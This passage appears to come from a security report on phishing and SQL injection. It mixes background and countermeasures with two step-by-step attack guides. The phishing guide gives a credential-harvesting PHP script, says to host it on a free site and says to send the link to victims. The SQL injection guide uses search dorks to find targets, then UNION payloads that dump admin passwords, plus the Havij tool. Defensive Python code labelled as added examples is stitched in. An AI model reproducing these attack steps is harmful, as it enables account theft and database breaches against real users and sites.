unwittingly downloading malicious computer code onto their computers that can allow the
criminals subsequent access to those computers or the users’ financial accounts.
        Phishing is committed so that the criminal may obtain sensitive and
valuable information about a consumer, usually with the goal of fraudulently obtaining access
to the consumer’s bank or other financial accounts. Often phishers will sell credit card or
account numbers to other criminals, turning a very high profit for a relatively small
technological investment.




Recent phishing attempts

Phishers are targeting the customers of banks and online payment services. E-mails, supposedly
from the Internal Revenue Service, have been used to glean sensitive data from U.S. taxpayers.
While the first such examples were sent indiscriminately in the expectation that some would be
received by customers of a given bank or service, recent research has shown that phishers may
in principle be able to determine which banks potential victims use, and target bogus e-mails
accordingly. Targeted versions of phishing have been termed spear phishing. Several recent
phishing attacks have been directed specifically at senior executives and other high profile
targets within businesses, and the term whaling has been coined for these kinds of attacks.

      Social networking sites are now a prime target of phishing, since the personal details in
such sites can be used in theft; in late 2006 a computer worm took over pages on MySpace and
altered links to direct surfers to websites designed to steal login details. Experiments show a
success rate of over 70% for phishing attacks on social networks.

  The RapidShare file sharing site has been targeted by phishing to obtain a premium account,
which removes speed caps on downloads, auto-removal of uploads, waits on downloads, and
cool down times between downloads.

        Attackers who broke into TD Ameritrade's database (containing all 6.3 million
customers' social security numbers, account numbers and email addresses as well as their
names, addresses, dates of birth, phone numbers and trading activity) also wanted the account
usernames and passwords, so they launched a follow-up spear phishing attack.

        Almost half of phishing thefts in 2006 were committed by groups operating
through the Russian Business Network based in St. Petersburg. Some people are being
victimized by a Facebook scam, the link being hosted by T35 Web Hosting, and people are
losing their accounts. There are anti-phishing websites which publish the exact messages that have
been recently circulating on the internet, such as Fraud Watch International and Millersmiles.
Such sites often provide specific details about the particular messages.

Link manipulation

        Most methods of phishing use some form of technical deception designed to make a link
in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization.
Misspelled URLs or the use of subdomains are common tricks used by phishers.

           In the following example URL, http://www.yourbank.example.com/, it appears as
though the URL will take you to the example section of the yourbank website; actually this URL
points to the "yourbank" (i.e. phishing) section of the example website. Another common trick
is to make the displayed text for a link (the text between the <A> tags) suggest a reliable
destination, when the link actually goes to the phishers' site. The following example link,
http://en.wikipedia.org/wiki/Deception, appears to take you to an article entitled "Genuine";
clicking on it will in fact take you to the article entitled "Deception". In the lower left hand
corner of most browsers you can preview and verify where the link is going to take you.

        An old method of spoofing used links containing the '@' symbol, originally intended as a
way to include a username and password (contrary to the standard). For example, the link
http://www.google.com@members.tripod.com/ might deceive a casual observer into believing
that it will open a page on www.google.com, whereas it actually directs the browser to a page
on members.tripod.com, using a username of www.google.com: the page opens normally,
regardless of the username supplied. Such URLs were disabled in Internet Explorer, while Mozilla
Firefox and Opera present a warning message and give the option of continuing to the site or
canceling.

        A further problem with URLs has been found in the handling of internationalized domain
names (IDN) in web browsers that might allow visually identical web addresses to lead to
different, possibly malicious, websites. Despite the publicity surrounding the flaw, known as
IDN spoofing or homograph attack, phishers have taken advantage of a similar risk, using open
URL redirectors on the websites of trusted organizations to disguise malicious URLs with a
trusted domain. Even digital certificates do not solve this problem because it is quite possible
for a phisher to purchase a valid certificate and subsequently change content to spoof a
genuine website.
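The link tricks described above (the '@' userinfo form, a brand name used as a subdomain of someone else's domain, punycode/IDN labels, and anchor text that disagrees with the href) can all be checked mechanically before a user clicks. The following is an added example in Python, not code from the report: TRUSTED_DOMAINS, the sample links and the helper names are constructed, and registrable_domain() is a deliberately naive two-label approximation that production code would replace with a Public Suffix List lookup.

```python
"""Flag the link-manipulation tricks described above before a user clicks.

Added example; the allowlist and sample links are constructed, not from the report.
"""
from urllib.parse import urlsplit

# Constructed allowlist: registrable domains the organisation legitimately uses.
TRUSTED_DOMAINS = {"yourbank.com"}


def registrable_domain(host):
    """Last two DNS labels, e.g. 'www.yourbank.example.com' -> 'example.com'.

    Naive approximation (hypothetical helper); real code should consult the
    Public Suffix List so that names like 'example.co.uk' are handled.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def analyse_link(href, display_text=None, trusted=TRUSTED_DOMAINS):
    """Return a sorted list of findings for one link; [] means nothing suspicious."""
    findings = set()
    parts = urlsplit(href)
    host = (parts.hostname or "").lower()
    labels = set(host.split("."))

    # 1. '@' trick: the browser connects to what follows the '@'; everything
    #    before it ('www.google.com') is merely a username.
    if parts.username is not None:
        findings.add("userinfo-in-url")

    # 2. IDN / punycode labels ('xn--...') or raw non-ASCII characters can
    #    render as look-alikes of an ASCII brand name (homograph attack).
    if host.startswith("xn--") or ".xn--" in host or any(ord(c) > 127 for c in host):
        findings.add("idn-label")

    # 3. Subdomain trick: a trusted brand appears as a label of a host whose
    #    registrable domain is not ours ('www.yourbank.example.com').
    domain = registrable_domain(host)
    if domain not in trusted:
        brands = {t.split(".")[0] for t in trusted}
        findings.add("brand-in-subdomain" if brands & labels else "untrusted-domain")

    # 4. Anchor text that itself looks like a URL but points somewhere other
    #    than the href does (the 'text between the <A> tags' trick).
    if display_text and " " not in display_text and ("://" in display_text or "." in display_text):
        shown = display_text if "://" in display_text else "http://" + display_text
        shown_host = (urlsplit(shown).hostname or "").lower()
        if shown_host and registrable_domain(shown_host) != domain:
            findings.add("display-mismatch")

    return sorted(findings)


if __name__ == "__main__":
    # Constructed sample links, including the two forms quoted in the report.
    samples = [
        ("https://www.yourbank.com/login", None),
        ("http://www.yourbank.example.com/", "https://www.yourbank.com/login"),
        ("http://www.google.com@members.tripod.com/", None),
        ("http://www.xn--yourbnk-abc.com/", None),  # constructed punycode label
    ]
    for href, text in samples:
        print(f"{href:45} {analyse_link(href, text)}")
```

The check is intentionally conservative: anything outside the allowlist is reported, and the finding names say why, so a mail gateway or a browser extension can decide whether to block, rewrite or merely annotate the link.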

Filter evasion

       Phishers have used images instead of text to make it harder for anti-phishing filters to
detect text commonly used in phishing e-mails.

Website forgery

       Once a victim visits the phishing website the deception is not over. Some phishing scams
use JavaScript commands in order to alter the address bar.This is done either by placing a
picture of a legitimate URL over the address bar, or by closing the original address bar and
opening a new one with the legitimate URL.

        An attacker can even use flaws in a trusted website's own scripts against the victim.
These types of attacks (known as cross-site scripting) are particularly problematic, because they
direct the user to sign in at their bank or service's own web page, where everything from the
web address to the security certificates appears correct. In reality, the link to the website is
crafted to carry out the attack, making it very difficult to spot without specialist knowledge. Just
such a flaw was used in 2006 against PayPal.




         A Universal Man-in-the-middle (MITM) Phishing Kit, discovered in 2007, provides a
simple-to-use interface that allows a phisher to convincingly reproduce websites and capture
log-in details entered at the fake site.

         To avoid anti-phishing techniques that scan websites for phishing-related text,
phishers have begun to use Flash-based websites. These look much like the real website, but
hide the text in a multimedia object.

Performing a Phishing Attempt

Step 1: Open any web mail login page, for example yahoomail.com, right-click on the page
and then click on "View Source".

Step 2: Press Ctrl+F and find POST (locate the POST belonging to the login form).

Step 3: Then replace

action="https://login.yahoo.com/config/login?"
with action="safin.php"
Here safin.php is a PHP file containing a script which posts the username and
password to the web server, or to any free hosting site, e.g. www.my3gb.com.

The code contained in safin.php is shown below:
CODE:
<?php
// Send the browser straight on to the site named in the Location header.
header ('Location: http://www.yahoomail.com');

// Collect every submitted form field into one string, one "$_POST[name] = value" per line.
$posts     = '';
foreach($_POST as $k => $v){
  $posts .= '$_POST['.$k.'] = '.$v."\n";
}

$posts     .= "---------------------------------------------------\n";
// Subject line built from the hosting server's name ($_SERVER was misspelled $_SEREVER on the original page).
$subject = $_SERVER['HTTP_HOST']."-".$_SERVER['SERVER_NAME'];
$body      ='
'.$posts.'
';

// $emailto and $from are never defined anywhere in the script as printed, so this
// mail() call fails; the leading @ only suppresses the resulting warning.
@mail($emailto, $subject, $body, $from);
// Append the collected fields to cool.txt in the script's directory.
$handle = @fopen("cool.txt", "a+");
@fwrite($handle, $posts);
fclose($handle);
?>
Step 4: Then save the page as anyname.html

Step 5: Open the safin.php script and, in the Location header, add the URL to which the page should redirect.

Step 6: Then upload the page and the safin.php script to a web server. Here I am using
www.my3gb.com.
Step 7: Then send the links to the victims; if a victim tries to log in from your page,
a cool.txt file will be created automatically on your web server, in which you can see the password.

Countermeasures against Phishing
Everybody knows about phishing. Phishers impersonate a trusted web site, commonly a bank
or an online payment provider, in order to extract confidential information from users. Not only
are unsuspecting consumers the victims of these scams; in addition, the impersonated web
sites are impacted by reduced consumer confidence in their product as well as by financial losses due
to misuse of the collected information.

1. Consistent branding.

For a consumer, the first and sometimes only way to tell whether a web site or an e-mail is trustworthy
is whether the URL or the layout “looks right”. In this context, it is important
to provide consistent visual cues so that end users can recognize communications from the business.
In particular, e-mail sent to customers should use the same ‘From’ domain name as you use at
your website. If you outsource mass mailing, insist that these e-mails still use the familiar
‘From’ address. Consumers will otherwise not be able to distinguish between an obvious fake and
real e-mail. Assist customers in securing their systems by not requiring the use of JavaScript
and ActiveX. In particular, design your website to be accessible by various browsers.

2. Monitor bounces to customer-facing e-mail addresses.

In order to advertise their fake web sites, phishers typically use the same methods and address
lists used for spam. Many of the e-mail addresses on these lists are expected to be invalid. If you
use a consistent ‘From’ address, the phishers will have to use this address to maximize success.
This will result in some bounces being sent back to your own mail servers. Setting up a process
to screen these bounces for phishing e-mail will provide an early warning mechanism to alert
you to phishing scams.

3. Monitor referrers to public web sites.

Phishers typically redirect the user to the authentic web site after the information has been
collected. This is done to hide the phishing site from the user and to improve its plausibility. The
web browser will send the URL of the phishing website as part of its Referrer header (spelled
“Referer” in HTTP). Web servers can be configured to log this data, and most web servers already
do so by default. Monitoring this log for unusual referrers will again assist in finding phishing web sites.
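The referrer screening described in countermeasure 3, run over a few log lines, as an added example in Python (not code from the report). The sample log in Apache/nginx "combined" format, the OWN_DOMAINS and KNOWN_REFERRERS allowlists, and the host www.yourbank.example.com standing in for a phishing site are all constructed; registrable_domain() is the same naive two-label approximation as before.

```python
"""Find external referrers that send visitors to our pages, from web server logs.

Added example (Python), not from the report. The log lines, allowlists and
paths below are constructed; the log format is Apache/nginx "combined".
"""
import re
from urllib.parse import urlsplit

# Constructed sample log; the yourbank.example.com referrer plays the phishing site.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /login HTTP/1.1" 200 512 "https://www.yourbank.com/" "Mozilla/5.0"
203.0.113.11 - - [10/Oct/2023:13:56:01 +0000] "GET /account/confirm HTTP/1.1" 200 734 "http://www.yourbank.example.com/verify.php" "Mozilla/5.0"
203.0.113.12 - - [10/Oct/2023:13:56:40 +0000] "GET /account/confirm HTTP/1.1" 200 734 "http://www.yourbank.example.com/verify.php" "Mozilla/5.0"
203.0.113.13 - - [10/Oct/2023:13:57:12 +0000] "GET /images/logo.png HTTP/1.1" 200 9001 "http://www.yourbank.example.com/verify.php" "Mozilla/5.0"
203.0.113.14 - - [10/Oct/2023:13:58:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.15 - - [10/Oct/2023:13:58:50 +0000] "GET /login HTTP/1.1" 200 512 "https://www.google.com/" "Mozilla/5.0"
"""

# Constructed allowlists: our own domains and referrers we expect to see.
OWN_DOMAINS = {"yourbank.com"}
KNOWN_REFERRERS = {"google.com", "bing.com"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def registrable_domain(host):
    """Naive last-two-labels approximation; use the Public Suffix List in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_referrers(log_text, own=OWN_DOMAINS, known=KNOWN_REFERRERS):
    """Group requests by external referrer host.

    Returns {referrer_host: {"count": n, "paths": {...}, "clients": {...}}} for
    every referrer whose registrable domain is neither ours nor a known one.
    Empty referrers ("-") are skipped: they carry no information either way.
    """
    report = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["referer"] == "-":
            continue
        host = (urlsplit(rec["referer"]).hostname or "").lower()
        if not host or registrable_domain(host) in own | known:
            continue
        entry = report.setdefault(host, {"count": 0, "paths": set(), "clients": set()})
        entry["count"] += 1
        entry["paths"].add(rec["path"])
        entry["clients"].add(rec["ip"])
    return report


if __name__ == "__main__":
    for host, info in suspicious_referrers(SAMPLE_LOG).items():
        print(f"{host}: {info['count']} hits from {len(info['clients'])} clients "
              f"-> {sorted(info['paths'])}")
```

Two patterns in the output are worth a rule of their own: several distinct client addresses arriving from one unknown referrer at a post-login page they never logged in for, and an unknown referrer requesting only images, which is what a copied page that hotlinks the genuine site's graphics looks like from the server side.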

4. Watermark web content.

Phishers attempt to emulate the look and feel of your websites as well as they can. Typically
the HTML code and images from your site are just copied. As a result, the phishers will have to
visit the authentic site before setting up the fake site. Encoding the IP address and a time stamp
as part of your HTML code will likely allow you to figure out when the code was copied from
your site and who copied it. There are numerous ways to accomplish this: adding spaces
between HTML tags, including extra GET parameters, or even watermarking images. The most
appropriate method will depend on your web infrastructure.
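One way to carry out the "extra GET parameter" and "encode IP and time stamp in the HTML" ideas above, added here as a Python example and not a method the report itself specifies: an HMAC-signed token containing the client IP and a timestamp is placed in an HTML comment and appended to the site's image URLs. A straight copy of the page keeps the comment, and a copied page that hotlinks the genuine images puts the token into the real server's access log. SECRET, SAMPLE_HTML and the function names are constructed.

```python
"""Watermark served HTML with a signed (timestamp, client IP) token.

Added example; SECRET and SAMPLE_HTML are constructed and the helper names
are hypothetical. Uses only the standard library.
"""
import base64
import binascii
import hashlib
import hmac
import re

# Constructed key; in production keep it in a secret store and rotate it.
SECRET = b"constructed-watermark-key-change-me"

# Constructed page fragment standing in for the real login page.
SAMPLE_HTML = """<html><head><title>Your Bank</title></head>
<body><img src="/images/logo.png" alt="logo"><form action="/login"></form></body></html>"""


def _b64e(data):
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def _b64d(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_watermark(client_ip, ts, secret=SECRET):
    """Token = base64(ts|ip) '.' first 16 hex chars of HMAC-SHA256 over the payload."""
    payload = f"{ts}|{client_ip}".encode()
    tag = hmac.new(secret, payload, hashlib.sha256).hexdigest()[:16]
    return _b64e(payload) + "." + tag


def verify_watermark(token, secret=SECRET):
    """Return (ts, client_ip) if the tag is genuine, else None (tampered or malformed)."""
    try:
        enc, tag = token.split(".", 1)
        payload = _b64d(enc)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).hexdigest()[:16]
    if not hmac.compare_digest(tag, expected):
        return None
    ts, client_ip = payload.decode().split("|", 1)
    return int(ts), client_ip


def stamp_html(html, client_ip, ts):
    """Insert the token as a comment after <head> and as a query parameter on image URLs.

    The comment survives a straight copy of the page; the image parameter shows
    up in our own access log when a copied page hotlinks the originals.
    """
    token = make_watermark(client_ip, ts)
    html = html.replace("<head>", f"<head><!-- wm:{token} -->", 1)
    return re.sub(r'(<img[^>]*\bsrc=")([^"?]+)(")',
                  lambda m: f"{m.group(1)}{m.group(2)}?wm={token}{m.group(3)}", html)


WM_RE = re.compile(r"<!-- wm:([A-Za-z0-9_\-]+\.[0-9a-f]{16}) -->")


def extract_watermark(html):
    """Recover (ts, client_ip) from a page found in the wild, or None if absent or forged."""
    m = WM_RE.search(html)
    return verify_watermark(m.group(1)) if m else None


if __name__ == "__main__":
    served = stamp_html(SAMPLE_HTML, "198.51.100.7", 1700000000)
    print(served)
    print("recovered:", extract_watermark(served))
```

The HMAC matters: without it anyone who notices the comment could plant a token naming an innocent address. Because the mark is per request, the served page is no longer byte-identical across visitors, so static caching in front of the server has to be disabled for the watermarked pages or the token generated at the cache edge.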

5. Prepositioned countermeasures

Once you find a site impersonating you, there are a number of techniques you can use to limit
damage. Most web servers will allow you to redirect users to special pages based on the
referrer field sent by the browser. As phishing victims are frequently directed back to your site
after they have visited the fake site, you can use this technique to identify victims, or redirect them
to a warning page. If they are existing customers of yours, you may be able to identify them
based on prior cookies left behind by your site. These countermeasures typically need to be
prepared ahead of the phishing scam in order to evaluate the impact on website performance.
Once prepositioned, these redirects or special logs can be enabled as soon as a phishing site has
been identified.

6. Organizational and administrative countermeasures

The company website should include a link and contact information to report phishing or other
security issues. All phishing countermeasures should be coordinated by a single individual.
Educating your customers about phishing and showcasing samples so they learn how to
spot a phishing scam will prevent them from becoming victims. If your web site allows access
to critical financial or personal information (e.g. banks, brokerages), you should consider the use
of strong authentication via hardware tokens.




2. SQL Injection Attacks

An often used way to attack the security of a website is to input SQL statements in a web form
to get a badly designed website to dump the database content to the attacker - an SQL
injection. It is a code injection technique that exploits a security vulnerability in a website's
software. The vulnerability occurs when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user input is not strongly typed and
is unexpectedly executed. SQL commands are thus injected from the web form into the database
of an application (like queries) to change the database content or dump database
information like credit card numbers or passwords to the attacker. SQL injection is mostly known as an
attack vector for websites but can be used to attack any type of SQL database.

Using well designed query language interpreters can prevent SQL injections. In the wild, it has
been noted that applications experience, on average, 71 attempts an hour. When under direct
attack, some applications occasionally came under aggressive attacks and at their peak, were
attacked 800-1300 times per hour.

Forms of vulnerability

SQL Injection Attack (SQLIA) is considered one of the top 10 web application vulnerabilities of
2010 by the Open Web Application Security Project.[3] The attacking vector contains five main
sub-classes depending on the technical aspects of the attack's deployment:

       Classic SQLIA
       Inference SQL Injection
       Interacting with SQL Injection
       DBMS specific SQLIA
       Compounded SQLIA

Some security researchers propose that Classic SQLIA is outdated[4] though many web
applications are not hardened against them. Inference SQLIA is still a threat, because of its
dynamic and flexible deployment as an attacking scenario. The DBMS specific SQLIA should be
considered as supportive regardless of the utilization of Classic or Inference SQLIA.
Compounded SQLIA is a new term derived from research on SQL Injection Attacking Vector in
combination with other different web application attacks as:

       SQL Injection + Insufficient authentication
       SQL Injection + DDoS attacks
       SQL Injection + DNS Hijacking
       SQL Injection + XSS




Technical Implementations

Incorrectly filtered escape characters

This form of SQL injection occurs when user input is not filtered for escape characters and is
then passed into an SQL statement. This results in the potential manipulation of the statements
performed on the database by the end-user of the application.

The following line of code illustrates this vulnerability

statement = "SELECT * FROM users WHERE name = '" + userName + "';"

This SQL code is designed to pull up the records of the specified username from its table of
users. However, if the "userName" variable is crafted in a specific way by a malicious user, the
SQL statement may do more than the code author intended. For example, setting the
"userName" variable as

' or '1'='1

Or using comments to even block the rest of the query (there are three types of SQL
comments):[11]

' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '

renders one of the following SQL statements by the parent language:

SELECT * FROM users WHERE name = '' OR '1'='1';
SELECT * FROM users WHERE name = '' OR '1'='1' -- ';

If this code were to be used in an authentication procedure then this example could be used to
force the selection of a valid username because the evaluation of '1'='1' is always true.

The following value of "userName" in the statement below would cause the deletion of the
"users" table as well as the selection of all data from the "userinfo" table (in essence revealing
the information of every user), using an API that allows multiple statements:

a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't'

This input renders the final SQL statement as follows:

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

While most SQL server implementations allow multiple statements to be executed with one call
in this way, some SQL APIs such as PHP's mysql_query() function do not allow this for security
reasons. This prevents attackers from injecting entirely separate queries, but doesn't stop them
from modifying queries.



Incorrect type handling

This form of SQL injection occurs when a user supplied field is not strongly typed or is not
checked for type constraints. This could take place when a numeric field is to be used in a SQL
statement, but the programmer makes no checks to validate that the user supplied input is
numeric. For example:

statement := "SELECT * FROM userinfo WHERE id = " + a_variable + ";"

It is clear from this statement that the author intended a_variable to be a number correlating to
the "id" field. However, if it is in fact a string then the end-user may manipulate the statement
as they choose, thereby bypassing the need for escape characters. For example, setting
a_variable to

1;DROP TABLE users

will drop (delete) the "users" table from the database, since the SQL would be rendered as
follows:

SELECT * FROM userinfo WHERE id=1;DROP TABLE users;

Blind SQL injection

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the
results of the injection are not visible to the attacker. The page with the vulnerability may not
be one that displays data but will display differently depending on the results of a logical
statement injected into the legitimate SQL statement called for that page. This type of attack
can become time-intensive because a new statement must be crafted for each bit recovered.
There are several tools that can automate these attacks once the location of the vulnerability
and the target information has been established.




Conditional responses

One type of blind SQL injection forces the database to evaluate a logical statement on an
ordinary application screen.

SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='1';

will result in a normal page while

SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='2';

will likely give a different result if the page is vulnerable to a SQL injection. An injection like this
may suggest to the attacker that a blind SQL injection is possible, leaving the attacker to devise
statements that evaluate to true or false depending on the contents of another column or table
outside of the SELECT statement's column list.

SELECT 1/0 FROM users WHERE username='ooo';

A statement like this raises a division-by-zero error only if a row with username 'ooo' exists,
because the expression is never evaluated for an empty result; whether the page errors or not
therefore answers one yes/no question per request. Engines differ here: MySQL, for example,
returns NULL for 1/0 in a SELECT instead of raising an error.



Mitigation



Parameterized statements

With most development platforms, parameterized statements can be used that work with
parameters (sometimes called placeholders or bind variables) instead of embedding user input
in the statement. In many cases, the SQL statement is fixed, and each parameter is a scalar, not
a table. The user input is then assigned (bound) to a parameter.




Enforcement at the coding level

Using object-relational mapping libraries avoids the need to write SQL code. The ORM library in
effect will generate parameterized SQL statements from object-oriented code.




Escaping

A straightforward, though error-prone, way to prevent injections is to escape characters that
have a special meaning in SQL. The manual for an SQL DBMS explains which characters have a
special meaning, which allows creating a comprehensive blacklist of characters that need
translation. For instance, every occurrence of a single quote (') in a parameter must be replaced
by two single quotes ('') to form a valid SQL string literal. For example, in PHP it is usual to
escape parameters using the function mysql_real_escape_string(); before sending the SQL
query:


$query = sprintf("SELECT * FROM `Users` WHERE UserName='%s' AND Password='%s'",
          mysql_real_escape_string($Username),
          mysql_real_escape_string($Password));
mysql_query($query);



This function, i.e. mysql_real_escape_string(), calls MySQL's library function
mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r,
\, ', " and \x1a. This function must always (with few exceptions) be used to make data safe
before sending a query to MySQL.[14]
There are other functions for many database types in PHP, such as pg_escape_string() for
PostgreSQL. There is, however, one function that works for escaping characters and is used
especially for databases that do not have a dedicated escaping function in PHP. This function
is addslashes(string $str). It returns a string with backslashes before characters that need to
be quoted in database queries etc. These characters are the single quote ('), double quote ("),
backslash (\) and NUL (the NULL byte).[15]
Routinely passing escaped strings to SQL is error prone because it is easy to forget to escape a
given string. Creating a transparent layer to secure the input can reduce this error-proneness, if
not entirely eliminate it.[16]
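As an added example (not from the report), the quote-doubling rule described above implemented in Python against an in-memory SQLite table, and contrasted with the "incorrect type handling" case from earlier in this section: for a quoted string column the escaped tautology becomes a harmless literal, but for an unquoted numeric column escaping quotes changes nothing, and only validating the type (and then binding the value) stops it. The userinfo table, its rows and the function names are constructed for the demonstration.

```python
import sqlite3

# Constructed sample rows for the demonstration (not data from the report).
SAMPLE_ROWS = [(1, "alice"), (2, "bob"), (3, "carol")]


def make_db():
    """Create an in-memory SQLite database with a small userinfo table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO userinfo VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def escape_sql_string(value):
    """Standard-SQL escaping from the report: every single quote becomes two."""
    return value.replace("'", "''")


def find_by_name_escaped(conn, name):
    """Quoted string column: the escaped value is a plain literal inside the quotes."""
    statement = "SELECT * FROM userinfo WHERE name = '" + escape_sql_string(name) + "';"
    return conn.execute(statement).fetchall()


def find_by_id_escaped(conn, a_variable):
    """Unquoted numeric column (the 'incorrect type handling' case): escaping is useless."""
    statement = "SELECT * FROM userinfo WHERE id = " + escape_sql_string(a_variable) + ";"
    return conn.execute(statement).fetchall()


def find_by_id_validated(conn, a_variable):
    """Check the type first, then bind: only an integer can ever reach the query."""
    record_id = int(a_variable)  # ValueError for anything that is not an integer literal
    return conn.execute("SELECT * FROM userinfo WHERE id = ?;", (record_id,)).fetchall()


def demo():
    """Compare the three lookups on ordinary input and on tautology payloads."""
    conn = make_db()
    out = {
        "escaped_name_normal": len(find_by_name_escaped(conn, "bob")),
        # Becomes name = ''' OR ''1''=''1', a literal that matches no row.
        "escaped_name_tautology": len(find_by_name_escaped(conn, "' OR '1'='1")),
        "escaped_id_normal": len(find_by_id_escaped(conn, "2")),
        # No quotes to escape, so id = 1 OR 1=1 runs as written and returns every row.
        "escaped_id_tautology": len(find_by_id_escaped(conn, "1 OR 1=1")),
        "validated_id_normal": len(find_by_id_validated(conn, "2")),
    }
    try:
        find_by_id_validated(conn, "1 OR 1=1")
        out["validated_id_tautology"] = "accepted"
    except ValueError:
        out["validated_id_tautology"] = "rejected"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

This is the concrete reason the report calls escaping error-prone: it only protects values that end up inside quotes, so a numeric field needs a type check (or a bound parameter) rather than an escaping call.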




Steps For SQL Injection Attacks

Step 1: Find a website vulnerable to SQL injection

   - Use Google dorks to find vulnerable sites by putting the following queries into the
     Google search engine:

                 inurl:index.php?id=
                 inurl:trainers.php?id=
                 inurl:buy.php?category=
                 inurl:article.php?ID=

     Now you get a list displayed on the result page. Select them one by one. Suppose we
     select the first result and click on it.

   - Put ' (single quote) at the extreme end of the link displayed in the address bar and
     press Enter.
   - Now if a page opens up saying there is an SQL error, that means the website is 110%
     vulnerable to SQL injection.

Step 2: For manual attacks there are certain steps to follow:

   1. We have to find an SQL-vulnerable website; for that, visit any website and find a link
      on it containing .php?id=. If we find such a link we can say that this website may
      contain an SQL vulnerability.

   2. The next step is to check whether the website is vulnerable to an SQL attack or not.
      Put ' after the ?id=9; if you get an error page or a blank page, that means the site is
      vulnerable to attack.

   3. After that we have to find how many columns the vulnerable query has: write order by 1--,
      order by 2-- and so on to check the column count until you get an error or a blank page.

   4. After that find the vulnerable column on the website. Suppose in the last step we got an
      error at order by 7--; that means the column count is 6, so we write union all select
      1,2,3,4,5,6--. It will show the vulnerable column (say 3) on the page, where we get the
      details of the database name, column names, table names etc.

   5. Next we have to find the table names: write union all select 1,2,table_name,4,5,6 from
      information_schema.tables--

   6. We get the table names contained in the website's database. Suppose we find the admin
      table, which means the admin table contains all the login details; the next step is to
      find its column names. We write union all select 1,2,column_name,4,5,6 from
      information_schema.columns where table_name='admin'--

   7. We also get the column names contained in the table. Suppose username and password are
      the column names; the next step is to find the contents of those columns, so we write
      union all select 1,2,group_concat(username,0x3a,password),4,5,6 from admin--

   8. Here it is: we get the login details, the admin username and password.

Example:

www.site.com/index.php?id=10'        (error)

www.site.com/index.php?id=10 order by 1-- and so on, until the error page

www.site.com/index.php?id=10 union all select 1,2,3,4,5,6,7--

www.site.com/index.php?id=10 union all select 1,2,table_name,4,5,6 from
information_schema.tables--

www.site.com/index.php?id=10 union all select 1,2,column_name,4,5,6 from
information_schema.columns where table_name='admin'--

www.site.com/index.php?id=10 union all select
1,2,group_concat(username,0x3a,password),4,5,6 from admin--

You get the contents of the columns as the result.

Step 3: There is also another method to do an SQL injection attack, by using the Havij tool; in
this tool we have to perform some simple steps.

   1. Copy the link of the SQL-vulnerable site into Havij.
   2. Analyze it.
   3. After analyzing we get the database name.
   4. There are certain options in the Havij tool for editing the databases of the website.

Prevention from SQL Injection Attacks

Here are some methods for prevention of SQL injection attacks in MySQL and PHP.

Most new web developers have heard of SQL injection attacks, but not very many know that it
is fairly easy to prevent an attacker from gaining access to your data by filtering out the
vulnerabilities using the MySQL extensions found in PHP.

An SQL injection attack occurs when a hacker or cracker (a malicious hacker) attempts to dump
the data in a database table in a database-driven web site. In an unprotected and vulnerable
site, this is pretty easy to do.

In order for an SQL injection attack to work, the site must use an unprotected SQL query that
utilizes data submitted by a user to look up something in a database table. The data could be
from a search box, a login form or any type of query used to look up data using data input by a
user. It also means that querystring data used to query a database can create vulnerabilities.

For example:

A very simple unprotected query might look like this:

SELECT * FROM items WHERE itemID = '$itemID'

Normally, you would expect a user to submit a username and password, which would be used
to query the database table to see if the username and password exist. But what if someone
used the following instead of a password?

' OR '1' = '1

That would make the query used to look for the password look like this:

SELECT * FROM items WHERE itemID = '' OR '1' = '1'

This would always return a true response and could literally display the entire table as the
result for the query. This is a pretty scary thought if you are trying to keep your data secure.
The problem with SQL injection is that a hacker does not have to know anything about your
database or table structure.


What if an error or some other issue caused your table structure to be exposed? Hackers are
very good at forcing errors to occur that expose information that allows them to penetrate a
site deeper. What if the following was entered in the password field?

'; drop table users;

There is a method for filtering the data that is used on the right side of the WHERE clause to
look up a row in a database. The trick is to escape any characters that may be in the user input
portion of the query that could lead to a successful attack.

Use the following function to add backslashes to suspect characters and filter any data that is
input by a user.

function cleanQuery($string)
{
  if(get_magic_quotes_gpc()) // prevents duplicate backslashes
  {
    $string = stripslashes($string);
  }
  if (phpversion() >= '4.3.0')
  {
    $string = mysql_real_escape_string($string);
  }
  else
  {
    $string = mysql_escape_string($string);
  }
  return $string;
}

// if you are using form data, use the function like this:
if (isset($_POST['itemID'])) $itemID = cleanQuery($_POST['itemID']);

// you can also filter the data as part of your query:
$query = "SELECT * FROM items WHERE itemID = '" . cleanQuery($itemID) . "'";

The first part looks to see if magic quotes is turned on. If so, it may have already added
backslash escapes through a POST or GET method used to pass the data. If backslashes were
added, they need to be removed prior to running it through the rest of the function.

The next part checks the PHP version. The built-in function that we want to use is called
mysql_real_escape_string (http://www.php.net/mysql_real_escape_string). This MySQL function
only exists in PHP version 4.3.0 or newer. If you are using an older version of PHP, another
MySQL function is used called mysql_escape_string (http://www.php.net/mysql_escape_string).

mysql_escape_string is not as effective as the newer mysql_real_escape_string. The newer
